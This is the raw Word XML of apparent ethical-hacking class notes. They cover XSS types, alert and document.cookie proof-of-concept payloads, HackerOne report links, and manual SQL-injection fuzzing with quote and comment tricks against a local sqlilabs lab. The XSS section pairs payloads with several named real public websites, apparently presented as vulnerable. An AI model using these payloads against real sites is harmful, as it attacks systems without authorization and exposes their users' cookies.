        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">"hello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are hacked")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000055B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000055C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>we have more than 1000+ default scripts - we can download from download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000055D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000055E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">to find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - manual or automated - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000055F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000560" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>understadning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the input field structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000561" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. prepare the payload accordingly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000562" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000563" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">types of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000564" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000565" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. reflected </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - client side temporary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000566" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">2. stored </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - stored in server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000567" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> environment is changed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000568" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000569" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>XSS Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000056A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.ubraintv.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000056B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>"&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000056C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000056D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>HTTPS://www.telcodata.us/SEARCH-COMPANIES-BY-AREA-CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000056E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>"&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000056F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000570" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://www.apc.org/en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000571" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>"&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000572" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000573" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://wellcomeopenresearch.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000574" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>"&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000575" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000576" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://www.filmon.com/group/uk-live-tv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000577" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000578" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000579" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000057A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Bug Report Samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000057B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000057C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">List of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reports for your reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000057D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000057E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/484801</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000057F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000580" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/330008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000581" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000582" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/892289</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000583" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000584" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/953579</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000585" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000586" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/647130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000587" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000588" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/177508</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000589" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000058A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/323005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000058B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000058C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/314518</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000058D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000058E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/485684</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000058F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000590" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/1118501</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000591" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000592" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/643908</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000593" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000594" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/485748</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000595" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000596" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/840759</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000597" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000598" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://hackerone.com/reports/438240</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000599" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000059A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000059B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>15-11-2021, MONDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000059C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000059D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000059E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Manual SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000059F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlilabs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000005A0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005A1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ID - input parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005A2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com/?ID=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005A3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005A4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>METHOD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005A5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. identifying injection points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005A6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. Generate error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005A7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. Analyse error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005A8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. Find user input encapsulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005A9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5. To balance the query - Removing the error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005AA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">6. to inject </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005AB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005AC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005AD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005AE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. identifying injection points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005AF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005B0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005B1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. Generate error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005B2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005B3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005B4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005B5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=acdfgfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005B6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=98746573</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005B7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=asndbdvj23943858</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005B8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=9999999999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005B9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005BA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005BB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005BC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005BD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005BE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005BF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005C0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>''1'' LIMIT 0,1' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005C1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005C2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>' LIMIT 0,1' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005C3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005C4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:tab/>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005C5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005C6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:tab/>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005C7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005C8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005C9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">If our input is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sankar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000005CA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>it can be encapsulated as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005CB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sankar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000005CC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sankar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005CD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sankar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005CE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sankar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005CF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&lt;'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sankar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005D0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&lt;"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sankar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005D1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005D2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005D3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5. To balance the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005D4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005D5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005D6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005D7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1' (we have to comment out the rest of the line)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005D8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005D9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>For commenting out, we can use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005DA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005DB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005DC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>%23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005DD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005DE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005DF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
